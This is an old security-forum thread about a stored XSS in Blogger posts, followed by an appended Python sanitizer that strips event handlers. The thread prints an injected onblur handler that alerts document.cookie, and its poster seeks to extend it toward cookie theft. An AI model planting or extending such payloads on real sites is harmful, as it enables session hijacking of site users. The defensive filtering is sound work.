Sla.ckers.org
Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.
Google Blogspot XSS Vulnerability
Posted by: sn
Date: August 22, 2007 09:52AM

Hi fellas,

I have been researching various vulnerabilities on blogspot.com (a Google entity) for a couple of days and found something interesting in Google Blogspot through which cookie stealing is possible. Here is my code; correct me if I'm wrong.

The code is working on my Blogspot account for testing.

<a onblur="javascript:alert(document.cookie)" href="http://bp3.blogger.com/_er6f39OjAgE/RssqA2y7uNI/AAAAAAAAABk/BbeITZK9BAg/s1600-h/5af1scd.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp3.blogger.com/_er6f39OjAgE/RssqA2y7uNI/AAAAAAAAABk/BbeITZK9BAg/s200/5af1scd.jpg" alt="" id="BLOGGER_PHOTO_ID_5101217197124729042" border="0" /></a>

I get the cookie using the above code. Please comment on my code.

Re: Google Blogspot XSS Vulnerability
Posted by: FiSh
Date: August 22, 2007 12:09PM

What's the point of all the styling on it? Changing the cursor? :/

Re: Google Blogspot XSS Vulnerability
Posted by: sn
Date: August 22, 2007 12:36PM

@Fish

Actually, I was trying to upload my pic on my blog, so I thought to play with it. That's the HTML code Blogspot generates automatically. So I put my code in onblur="javascript:alert(document.cookie)" to get cookie info. It gives me cookies back too.

I'm looking for some good insight to extend it.

Sn

Re: Google Blogspot XSS Vulnerability
Posted by: hackathology
Date: November 25, 2007 09:15AM

Nice one

http://hackathology.blogspot.com

Re: Google Blogspot XSS Vulnerability
Posted by: Om
Date: May 01, 2008 02:53AM

My tryst with destiny http://sla.ckers.org/forum/read.php?2,20088,20088 :P

BTW, are you sure you are getting the cookie? I tried testing but Blogger doesn't vomit any cookie values. Just a blank alert box. :|
Link: http://icanhazxss.blogspot.com/
Additionally, Blogger doesn't seem to be using HttpOnly cookies.

---
I'd love to change the world,
but they won't gimme the source code.
Code in my Bug!
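
The thread turns on an onblur handler surviving in the HTML stored for a blog post. As an added example (not code from the thread or from Blogger), here is a server-side allowlist filter that re-serialises post HTML and drops event-handler attributes. The allowlist, the example.com URLs and the sample markup are constructed assumptions.

```python
from html import escape
from html.parser import HTMLParser

# Assumed allowlist for illustration: tag -> attributes allowed on it.
# on* handlers and style are absent, so they are dropped by default.
ALLOWED = {"a": {"href"}, "img": {"src", "alt", "id", "border"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = ("http://", "https://")
VOID = {"img"}

class PostSanitizer(HTMLParser):
    """Rebuilds post HTML from parsed tokens, keeping only allowlisted parts."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped = [], []   # dropped: (tag, attr) for logging

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            self.dropped.append((tag, None))   # whole tag removed
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            ok = name in ALLOWED[tag]
            if ok and name in URL_ATTRS:       # rejects javascript:, data:, ...
                ok = value.strip().lower().startswith(SAFE_SCHEMES)
            if ok:
                kept.append(f' {name}="{escape(value, quote=True)}"')
            else:
                self.dropped.append((tag, name))
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))          # text is always re-escaped

def sanitize(html):
    parser = PostSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped

# Constructed sample shaped like the image markup posted in the thread.
SAMPLE = ('<a onblur="javascript:alert(document.cookie)" href="http://example.com/full.jpg">'
          '<img style="cursor: pointer;" src="http://example.com/thumb.jpg" alt="" border="0" /></a>')
```

The dropped list gives a per-post record of what was stripped, which is worth logging when reviewing submissions for handler injection.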
